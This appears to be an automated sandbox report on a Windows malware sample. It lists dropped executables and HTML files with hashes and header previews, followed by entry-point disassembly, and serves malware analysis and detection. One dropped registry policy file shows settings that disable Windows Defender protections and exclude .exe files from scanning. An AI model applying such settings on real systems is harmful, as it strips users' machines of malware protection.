                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......v..p2.b#2.b#2.b#.E.#?.b#.E.#..b#.E.#*.b#...#0.b#..f"!.b#..a"*.b#..g"..b#;..#9.b#;..#5.b#2.c#,.b#..g"..b#..b"3.b#...#3.b#..`"3.b#Rich2.b#........................PE..L.....@f...............!.............e............@.......................................@.........................p}..4....}..P.......`....................p...*...E..T....................F......X...@...................,r.. ....................text...,........................... ..`.rdata..............................@..@.data................t..............@....didat.......p......................@....rsrc...`...........................@..@.reloc...*...p...,...l..............@..B................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                          Category:dropped
                                          Size (bytes):11403264
                                          Entropy (8bit):7.976262170621303
                                          Encrypted:false
                                          SSDEEP:196608:SYvZvPF60956XHt6+YF+ELzL2Zjbn2YH0oD6DGcCwHbGkG:3Fcw5kHo5F+E+j7260oOYc
                                          MD5:D43AC79ABE604CAFFEFE6313617079A3
                                          SHA1:B3587D3FA524761B207F812E11DD807062892335
                                          SHA-256:8B750884259DD004300A84505BE782D05FCA2E487A66484765A4A1E357B7C399
                                          SHA-512:BB22C73ED01FF97B73FEB68AE2611B70EF002D1829035F58A4BA84C5A217DB368AAE8BDC02CDEC59C1121922A207C662AA5F0A93377537DA42657DD787587082
                                          Malicious:true
                                          Reputation:unknown
                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...._3f..........#..........,......`..........@.......................................... .................................................06..d.......X,...Y...*..............................................(....W..8...............h............................text....~.......................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.00cfg..............................@..@.tls................................@....text0....,......................... ..`.text1..8...........................@....text2............................`..h.rsrc...X,.........................@..@........................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):4815512
                                          Entropy (8bit):7.796002238696443
                                          Encrypted:false
                                          SSDEEP:98304:+yjDqWHejZxTbsZFmVRVMGGLwMjzfq/+gIopszmuJDRXts3fYw:+uz+jZuyWTzjzp1opszZL9s3fF
                                          MD5:C0FEE8DB6325C8C1B3F8CCD13574C65A
                                          SHA1:2DDC159F8A06218C7622C7CD107598BE1FBD3C99
                                          SHA-256:D177DC7BA9F3E8511B08293B8CF92AF0BA4DEDD029C9F8365FCF05AFA8375344
                                          SHA-512:76ED65DC22149C9263C83D73D16A08E99B9137E619FE26AF852ACC2B4AF127C43BD5C6DD2BD16BA117C3432E1422F54157FE6CCB6E9D997E02C776BD52A26BF9
                                          Malicious:true
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....iLf...............'.............P...........@..........................0}.......I...@..................................F2.@.....p..-............I..t....o...............................9. .....o.@.............O.......E.@....................text.............................. ..`.rdata..2~..........................@..@.data...0I...P......................@....vmp...|..........................`..`.vmp....>.. 1...>.................`..`.reloc........o.......>.............@..@.rsrc....-....p..8....>.............@..@........................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):4795544
                                          Entropy (8bit):7.790038180467164
                                          Encrypted:false
                                          SSDEEP:98304:ltzqmVRdoYb1nmPuPeHpxCHleUtEz7M9TrZHYErpLHE3OJots3fYa:ltZVR2uwU7EwtrNUs3ff
                                          MD5:6151F5177B7B35E3D7CEE99A2FC9AF24
                                          SHA1:2E0C8320FC5C6E11CFFB6A1A5085DB450F0BAF08
                                          SHA-256:1186878B54CD5CE32FFE84632051A57E9B62C7243187DB25BBAC6C57D2AD67AF
                                          SHA-512:69A536208B7E228E0AD51842AA00BA3FAEE4C29D952C15DFE90F8C58A3C7AC3CCE61E0FDEAEA2615FC6268459820F468543D52CF62AFD4D2A026E2A517B63031
                                          Malicious:true
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....iLf...............'.............3S...........@...........................|.....i.J...@.................................t.L.@.....o..-............H..t....o...............................3. .....o.@............ U.....(#D.@....................text.............................. ..`.rdata..2~..........................@..@.data...0I...P......................@....vmp...x..........................`..`.vmp...u>.. 1..v>.................`..`.reloc........o......z>.............@..@.rsrc....-....o..8....>.............@..@........................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):4791448
                                          Entropy (8bit):7.801357729474096
                                          Encrypted:false
                                          SSDEEP:98304:fvlJEFn6D4/425BLJxuixbvOprXQPmVR64t6Grx+ts3fY:fvlGiS3lPr7OqOR6oMs3f
                                          MD5:9A78F27AA9D999EEE10CB154BA964869
                                          SHA1:D1AF2D2D1195415791F59285A9BCFA5EE0880EBD
                                          SHA-256:CF53B17C2ABC3B8AC0B149E2496726C5C7D67EC0712F56339F2870CA6D616DB6
                                          SHA-512:B0AB7D1A8492A1A318C10E7402CF36EF22BF80DB77AAC33F744296DCD01B17E438D65D2371FC733AEC28C671CD90DBF6CECB9BC23A9DB1163F183FEB70C7709C
                                          Malicious:true
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....iLf...............'.............5i...........@...........................|.....j.I...@.................................@tl.@.....o..-............H..t....o...............................:. ....lo.@.............m......]l.@....................text.............................. ..`.rdata..2~..........................@..@.data...0I...P......................@....vmp..$m..........................`..`.vmp...d>...1..f>.................`..`.reloc........o......j>.............@..@.rsrc....-....o..8...p>.............@..@........................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):5784496
                                          Entropy (8bit):7.99910944014302
                                          Encrypted:true
                                          SSDEEP:98304:mekOFPgruSYB8N5sZiRqR0RVfeD8edrD7SOCWMXhcxVWpUicGPlheuw3cclMjl:Hs6+NKmV2D8el73CcXqhPPlheN3cclMR
                                          MD5:8B7B381CF7D4F577009F99FCE7E5FD39
                                          SHA1:532A3AA24F4A0EEAEB3178BA1E3B0D5C03919196
                                          SHA-256:D6E1F4954E9F21CA9B289BE4CFA7B330A944B3618E96C3C8032C531F02E2E644
                                          SHA-512:FC04EFA1A0EB63B8CA249519DC54F8897DE010F83A38BA225E02B81BEFB6CF5AEF58BBC6883B664DCA666E1A0B79A47C4CAC3D2B35348F3FEBDB48CE4C3EA48C
                                          Malicious:true
                                          Reputation:unknown
                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F......$.............@..........................@...................@..............................P........,..........................................................................................................CODE....D........................... ..`DATA....L...........................@...BSS.....H................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):7595262
                                          Entropy (8bit):7.996899559951484
                                          Encrypted:true
                                          SSDEEP:196608:91O5nvaGdWgO+iCmuKFbReaGO/31RZQpbtElhEe:3OBvaGdWgP01FdZQVeP
                                          MD5:3542F60DFEF8BA16451AB6097587BF63
                                          SHA1:290FD517CC5834D1216702DBA769B2A286017E7F
                                          SHA-256:F08C7E5C8715AAE484AC4B4365249EA0374B5CD321D0CDB316FD550086A676EE
                                          SHA-512:937B842A135C2BC110EBEF75A841141CDF05AEB9AC9364580F7D6A61C6EC7378C979E0C775CB64D210AEF6EFC95AF8C830860350673BA76D8DFBEF379A27947D
                                          Malicious:true
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:HTML document, ASCII text, with very long lines (6927)
                                          Category:dropped
                                          Size (bytes):467478
                                          Entropy (8bit):5.350880894003256
                                          Encrypted:false
                                          SSDEEP:12288:MksqektwIB8rI0J0rAmv8N5a2MChtQZBtnI766D:MksqU5a2MChtQG
                                          MD5:CE5404E454B9C087A22756D9E39C1CFC
                                          SHA1:9096D6D3765AEB84213F050CD911A2A4D30B3BE7
                                          SHA-256:5D132ED50256A151B9E54E53F5E1C4004A689E9276DCF7944FE9CA738D6ABC7C
                                          SHA-512:D42C6D160F90850560F17F3B9CE344D8B8C76DD476D5ACA32CDC6F92AB5CB01FF99E344D2C92E4CB76DEF09E9C00C0C37C190514C740196B0281CBF001B945D3
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:<!DOCTYPE html>.<html lang='en' dir='ltr'>.<head>.<meta http-equiv="X-UA-Compatible" content="IE=edge" />..<link rel="shortcut icon" href="/images/icons/favicons/fav_logo.ico?7" />..<link rel="apple-touch-icon" href="/images/icons/pwa/apple/default.png?15">..<meta http-equiv="content-type" content="text/html; charset=windows-1251" />.<meta http-equiv="origin-trial" content="AiJEtxZTdbmRu3zkrD0Bg/GvReuip5r0aklN7tIrw1Yit01/+j7PNlJFAyMMo/vqqNVvDmRsGCPGfVtNn5ookQ8AAABueyJvcmlnaW4iOiJodHRwczovL3ZrLmNvbTo0NDMiLCJmZWF0dXJlIjoiRG9jdW1lbnRQaWN0dXJlSW5QaWN0dXJlQVBJIiwiZXhwaXJ5IjoxNjk0MTMxMTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="><meta name="theme-color" content="#ffffff">.<meta name="color-scheme" content="light">..<title>Error | VK</title>..<noscript><meta http-equiv="refresh" content="0; URL=/badbrowser.php"></noscript>.<script nomodule>(function(){"use strict";function e({needRedirect:e}){const n=new XMLHttpRequest;n.open("GET","/badbrowser_stat.php?act=nomodule"),n.send(),e&&window.location.replace
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:HTML document, ASCII text, with CRLF, LF line terminators
                                          Category:dropped
                                          Size (bytes):1251
                                          Entropy (8bit):5.242123603799515
                                          Encrypted:false
                                          SSDEEP:24:hYYIzDImyJRA3ZsjNQCRtgoLY95Mu56+eDHHLFCOXAkRcfRrzd0Ll72rKQk:rqLKj2CZLY5Mc6NDLYzkYKLlOM
                                          MD5:8150F458ED6FB9B1DB4E5CFA57A1A281
                                          SHA1:6E5726854D28687B560D7FDCB5C782C425C7DFB9
                                          SHA-256:4C13D452DD5D49671BD93CA32F2B4F85C78E39B6AB0AD1F38D98ED267F8FD896
                                          SHA-512:4CC6A112673AEF8BB8BB8A385C26791B805D43BB707B509880E894F1C83BAB4E16F13DE187036C5F660C3BEC1D286258396B7BDE65C5D7945C5019665196818C
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:<!DOCTYPE html>.<html style="height:100%">.<head>.<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />.<title> 404 Not Found..</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>.<body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">.<div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">. <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1>.<h2 style="margin-top:20px;font-size: 30px;">Not Found..</h2>.<p>The resource requested could not be found on this server!</p>.</div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):363520
                                          Entropy (8bit):7.572113333742383
                                          Encrypted:false
                                          SSDEEP:6144:KnRqyzZ8VqCaMx3CkcY7FGCdGr0gx1POGIAYanWdHBSxz27XrvnksFwemJ:6RqyzZ2IOGCgfPOGI2nWdhSzUbkReG
                                          MD5:22152460B13E4C2473DC3FCDEA192933
                                          SHA1:48CE4A69302E860CD905CD02A10AAC942F09D9F3
                                          SHA-256:51CBA9B4AEFEFAF72A791E1929F98553F50D643A22179A6AAAC9D13F45EA8B43
                                          SHA-512:1DBCC6F21C9ADFC4F28434CFFAC8C00FB251E3FBF574A69345792837989F74BFC74A67462E7C4F71333A07CAF90E0F3E6C51DAF0B2640BAE3E06AF14C8855104
                                          Malicious:true
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I.w/...|...|...|..}...|..}...|..}...|..}...|...|V..|.l.}...|.l.}...|.l.}@..|.o.}...|.o.}...|Rich...|................PE..L....Pf...............'.............G............@.......................................@.................................hY..(...............................L....?...............................>..@...............@............................text.............................. ..`.bss................................ ..`.rdata..............................@..@.data....A...p...4...>..............@....reloc..L............r..............@..B................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:HTML document, ASCII text, with very long lines (6927)
                                          Category:dropped
                                          Size (bytes):467335
                                          Entropy (8bit):5.35094799137627
                                          Encrypted:false
                                          SSDEEP:12288:MksqektwIB8rI0J0rAmv8C5a2MChtQZBtnI766P:MksqF5a2MChtQS
                                          MD5:3F00017D6CF6A50E1CD6ECE9F02F2C9A
                                          SHA1:21B7187F0FA8F06F741125DE982A969CA3994EF3
                                          SHA-256:4358CC24C7AC007077780FCE3A5D27C6FD9A2DFC28937BDBB55A7BC894291801
                                          SHA-512:45BD2CFE3EBAE05278607994E0B3EAF64347F505E4E3509BA8785FD00D014B91691C6508EBFC74943E2708F733B8A5D5C1C1E3E329EC415D7876247AAF97D0C5
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:<!DOCTYPE html>.<html lang='en' dir='ltr'>.<head>.<meta http-equiv="X-UA-Compatible" content="IE=edge" />..<link rel="shortcut icon" href="/images/icons/favicons/fav_logo.ico?7" />..<link rel="apple-touch-icon" href="/images/icons/pwa/apple/default.png?15">..<meta http-equiv="content-type" content="text/html; charset=windows-1251" />.<meta http-equiv="origin-trial" content="AiJEtxZTdbmRu3zkrD0Bg/GvReuip5r0aklN7tIrw1Yit01/+j7PNlJFAyMMo/vqqNVvDmRsGCPGfVtNn5ookQ8AAABueyJvcmlnaW4iOiJodHRwczovL3ZrLmNvbTo0NDMiLCJmZWF0dXJlIjoiRG9jdW1lbnRQaWN0dXJlSW5QaWN0dXJlQVBJIiwiZXhwaXJ5IjoxNjk0MTMxMTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="><meta name="theme-color" content="#ffffff">.<meta name="color-scheme" content="light">..<title>Error | VK</title>..<noscript><meta http-equiv="refresh" content="0; URL=/badbrowser.php"></noscript>.<script nomodule>(function(){"use strict";function e({needRedirect:e}){const n=new XMLHttpRequest;n.open("GET","/badbrowser_stat.php?act=nomodule"),n.send(),e&&window.location.replace
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):80896
                                          Entropy (8bit):6.015374450878895
                                          Encrypted:false
                                          SSDEEP:1536:0k9jHELqei8IP+UzrebBL105tPnNO3ByiGbhwkapILOHn3cUd:0k9jHdeIzrebrCPN2cto
                                          MD5:0951BF8665040A50D5FB548BE6AC7C1D
                                          SHA1:59F4315D9953700B41E3CD026054821145DD2E68
                                          SHA-256:F8E639176247F80ED86FEC07F31735F3381AF3B30F7512F4F9E06A04F0FAB489
                                          SHA-512:B159DF503A9CFDC0740123D7060918FB1444743417B645C9C28B4FB2AEDEC75660F84F55B3D62A89921B0D76B7AB199DBFE639844A9A11BC6458FB0E06B9FEAD
                                          Malicious:true
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....)..........."...0..4............... .....@..... ....................................`...@......@............... ...............................`...............................S..8............................................................ ..H............text....3... ...4.................. ..`.rsrc........`.......6..............@..@........................................H....... !...............-...&...........................................0..L.......(....(.....~......i .....@(..........i(..........(....(....t....o.....(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*V(....r7..p~....o....*.~....*..(....*Vs....(....t.........*..BSJB............v4.0.30319......l.......#~..\.......#Strings....T...<...#US.........#GUID.......@...#Blob...........W..........3........!...............................................................
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):2121216
                                          Entropy (8bit):6.847277642413426
                                          Encrypted:false
                                          SSDEEP:49152:s4K3x1vU2JtTF+TxMoxc1TU+j+dAzGwlrh:s4Ex182tIuoITsdZ
                                          MD5:E22EFC95638F4C4E07FD7DABA5BD3154
                                          SHA1:DB73B614E897241D5321DC46EC25A302958ECD84
                                          SHA-256:11BDA3957B2FD86E57B1677149C0558686C11E31AE500F671D4D9A44F6E6F48F
                                          SHA-512:84DAC88794F1692CCB88F09A6F8EDFF231E9524F79CD8AF40414ACDBACAFBFE3FC1C79D9CC9A4A9190EB9CEF02D23247129E8461875176840E96641375B75122
                                          Malicious:true
                                          Reputation:unknown
                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................P............... ....@........................... ..................@...........................`..J"...p...D......................<...................................................................................CODE................................ ..`DATA.....&... ...(..................@...BSS.....-....P.......6...................idata..J"...`...$...6..............@....tls.................Z...................rdata...............Z..............@..P.reloc..<............\..............@..P.rsrc....D...p...D..................@..P.............. ......^ .............@..P........................................................................................................................................
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:modified
                                          Size (bytes):33126
                                          Entropy (8bit):4.913947371740327
                                          Encrypted:false
                                          SSDEEP:768:QhnnnnTEzzUUJBRRRVVrlrrrrYZrrrt5X0SHgHgZgZgUgUi/1OkGk1/pprYHHH1Q:QhnnnnTEzzUUJBRRRVVrlrrrrYZrrrtH
                                          MD5:26D0E4304B0698FDD5A76012D4C038A2
                                          SHA1:C7BFAAF8B6E41CCE90DD74452B5345CBEF9C07C4
                                          SHA-256:830F8E6E0807C69D388D7DF26F2E0FA29399E19BA3F84D114D6796B5D227ECE9
                                          SHA-512:90B9BD88CEA839B5ED30F5699DB09DA3CC83ED24D958AA4D4AD4CECB9F0EC49F36A2DF56EFF3FFBC2D11297A6DD7D4E7DA0B812ACE1A3BCCE8AD0C2E0BBC2384
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:10/03/2023 7:55:56.00000693:RegEnumKeyExW failed with (259)..10/03/2023 7:55:56.00000693:GP object initialized successfully..10/03/2023 7:55:56.00000756:Deny_All not set for all. Will query other 6 GUIDs..10/03/2023 7:55:56.00000772:Policy for other GUID is not enabled, status: 1008..10/03/2023 7:55:56.00000772:Policy for other GUID is not enabled, status: 1008..10/03/2023 7:55:56.00000772:Policy for other GUID is not enabled, status: 1008..10/03/2023 7:55:56.00000772:Policy for other GUID is not enabled, status: 1008..10/03/2023 7:55:56.00000772:Policy for other GUID is not enabled, status: 1008..10/03/2023 7:55:56.00000787:Policy for other GUID is not enabled, status: 1008..10/03/2023 7:55:56.00000787:Deny_All for all devices is being reset..10/03/2023 7:55:56.00000787:Will delete security for disk..10/03/2023 7:55:56.00000787:Volume interface name \\?\storage#volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}..10/0
                                          Process:C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):11
                                          Entropy (8bit):3.2776134368191165
                                          Encrypted:false
                                          SSDEEP:3:1EX:10
                                          MD5:EC3584F3DB838942EC3669DB02DC908E
                                          SHA1:8DCEB96874D5C6425EBB81BFEE587244C89416DA
                                          SHA-256:77C7C10B4C860D5DDF4E057E713383E61E9F21BCF0EC4CFBBC16193F2E28F340
                                          SHA-512:35253883BB627A49918E7415A6BA6B765C86B516504D03A1F4FD05F80902F352A7A40E2A67A6D1B99A14B9B79DAB82F3AC7A67C512CCF6701256C13D0096855E
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:[General]..
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:RAGE Package Format (RPF),
                                          Category:dropped
                                          Size (bytes):1926
                                          Entropy (8bit):3.310422749310586
                                          Encrypted:false
                                          SSDEEP:24:wSLevFeSLe5BeSwbv5qweSw4q7j/eScdepWDbVeScden2W8eScdemevtmeScdeRg:KFIBkbv5qwk4qfKV2QxVCZ
                                          MD5:CDFD60E717A44C2349B553E011958B85
                                          SHA1:431136102A6FB52A00E416964D4C27089155F73B
                                          SHA-256:0EE08DA4DA3E4133E1809099FC646468E7156644C9A772F704B80E338015211F
                                          SHA-512:DFEA0D0B3779059E64088EA9A13CD6B076D76C64DB99FA82E6612386CAE5CDA94A790318207470045EF51F0A410B400726BA28CB6ECB6972F081C532E558D6A8
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:PReg....[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r...;.D.i.s.a.b.l.e.A.n.t.i.S.p.y.w.a.r.e...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r...;.D.i.s.a.b.l.e.R.o.u.t.i.n.e.l.y.T.a.k.i.n.g.A.c.t.i.o.n...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.E.x.c.l.u.s.i.o.n.s...;.E.x.c.l.u.s.i.o.n.s._.E.x.t.e.n.s.i.o.n.s...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.E.x.c.l.u.s.i.o.n.s.\.E.x.t.e.n.s.i.o.n.s...;.e.x.e...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.R.e.a.l.-.T.i.m.e. .P.r.o.t.e.c.t.i.o.n...;.D.i.s.a.b.l.e.B.e.h.a.v.i.o.r.M.o.n.i.t.o.r.i.n.g...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.R.e.a.l.-.T.i.m.e. .P.
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):127
                                          Entropy (8bit):5.0926418767732935
                                          Encrypted:false
                                          SSDEEP:3:1ELGUAgKLMzY+eWgTckbnnvjiBIFVTjSUgf4orFLsXovn:1WsMzYHxbnvEcvgeyn
                                          MD5:7CC972A3480CA0A4792DC3379A763572
                                          SHA1:F72EB4124D24F06678052706C542340422307317
                                          SHA-256:02AD5D151250848F2CC4B650A351505AA58AC13C50DA207CC06295C123DDF5E5
                                          SHA-512:FF5F320356E59EAF8F2B7C5A2668541252221BE2D9701006FCC64CE802E66EEAF6ECF316D925258EB12EE5B8B7DF4F8DA075E9524BADC0024B55FAE639D075B7
                                          Malicious:true
                                          Reputation:unknown
                                          Preview:[General]..gPCMachineExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}]..Version=2..
                                          File type:MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                          Entropy (8bit):7.247307521328743
                                          TrID:
                                          • Win64 Executable (generic) (12005/4) 74.95%
                                          • Generic Win/DOS Executable (2004/3) 12.51%
                                          • DOS Executable Generic (2002/1) 12.50%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                          File name:CHA0VZiz8y.exe
                                          File size:6'923'264 bytes
                                          MD5:f0587649682207064554a2372966435d
                                          SHA1:2e8b948dfcffceb8acf550a585d2ea127f28f41f
                                          SHA256:6bd479dd9293043d4149641897629169df609adf72926d32adfe0094c583828e
                                          SHA512:f5d683b9f71f5f3647d0592f801c02f1dcea7eb49b16fa2e481487d0abc1770610dc9182148a68f749b19950fc3b122911ae0fd1b167ce5dde31931a14b45fdd
                                          SSDEEP:49152:/d84kqSab6V599+xS6Zokh5QK4SbHo/xak/tMw1NxcwCr4RCmUUdr5snBK0PSGUh:/G4kwGb948Aok/+OwVRcwksVsnkL7
                                          TLSH:50665BBB39508C16D84E947541FFB01DC703B47E950EE66B546A32B0AF0A92DAD8B7C3
                                          File Content Preview:MZ@.....................................!..L.!Win64 .EXE...$@...PE..d...3.;f.........."....'.............D.........@.....................................!j... ..........................................................0..d..................................
                                          Icon Hash:13cbab63db19c0a3
                                          Entrypoint:0x140bb44e7
                                          Entrypoint Section:.themida
                                          Digitally signed:false
                                          Imagebase:0x140000000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                          DLL Characteristics:HIGH_ENTROPY_VA, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x663B8B33 [Wed May 8 14:24:51 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:6
                                          OS Version Minor:0
                                          File Version Major:6
                                          File Version Minor:0
                                          Subsystem Version Major:6
                                          Subsystem Version Minor:0
                                          Import Hash:1ba19d25372b3cb9b6f9bdd416ebf12c
                                          Instruction
                                          push ebp
                                          call 00007F322922727Eh
                                          pop ebp
                                          dec eax
                                          sub ebp, 001D54EDh
                                          call 00007F32292272D7h
                                          pop eax
                                          dec eax
                                          sub eax, 00BB44FAh
                                          jmp 00007F3229227395h
                                          jmp 00007F322922727Dh
                                          jmp 00007F322922724Dh
                                          jmp 00007F3229227286h
                                          jmp 00007F32292272BCh
                                          dec eax
                                          mov eax, eax
                                          jmp 00007F32292326D5h
                                          jmp 00007F3229233E64h
                                          mov ebx, 00000800h
                                          add byte ptr [eax], al
                                          add byte ptr [eax], cl
                                          add byte ptr [eax], al
                                          add byte ptr [ecx-5CFEF300h], cl
                                          add byte ptr [esi], al
                                          add byte ptr [eax], al
                                          add byte ptr [edx], cl
                                          add byte ptr [eax], al
                                          add byte ptr [A0E4B301h], cl
                                          jmp 00007F322923271Fh
                                          or eax, 7827A801h
                                          inc eax
                                          or al, byte ptr [eax]
                                          add byte ptr [eax], al
                                          or eax, 4B60BA01h
                                          inc edx
                                          or al, byte ptr [eax]
                                          add byte ptr [eax], al
                                          or eax, 1CA27B01h
                                          inc ecx
                                          or al, byte ptr [eax]
                                          add byte ptr [eax], al
                                          or eax, 31FF2F01h
                                          inc edx
                                          or al, byte ptr [eax]
                                          add byte ptr [eax], al
                                          or eax, DB3EA901h
                                          inc eax
                                          or al, byte ptr [eax]
                                          add byte ptr [eax], al
                                          or eax, C37B3301h
                                          inc ecx
                                          or al, byte ptr [eax]
                                          add byte ptr [eax], al
                                          or eax, 31BAE701h
                                          inc ecx
                                          or al, byte ptr [eax]
                                          add byte ptr [eax], al
                                          or eax, CAB47201h
                                          add byte ptr [edx], cl
                                          add byte ptr [eax], al
                                          add byte ptr [4DB44201h], cl
                                          dec dword ptr [edx]
                                          add byte ptr [eax], al
                                          add byte ptr [51F65601h], cl
                                          inc ecx
                                          or al, byte ptr [eax]
                                          add byte ptr [eax], al
                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x9dd0ba0x118.idata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x9c30000x19e64.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0xdf8b100xc.themida
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x9de0180x28.tls
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
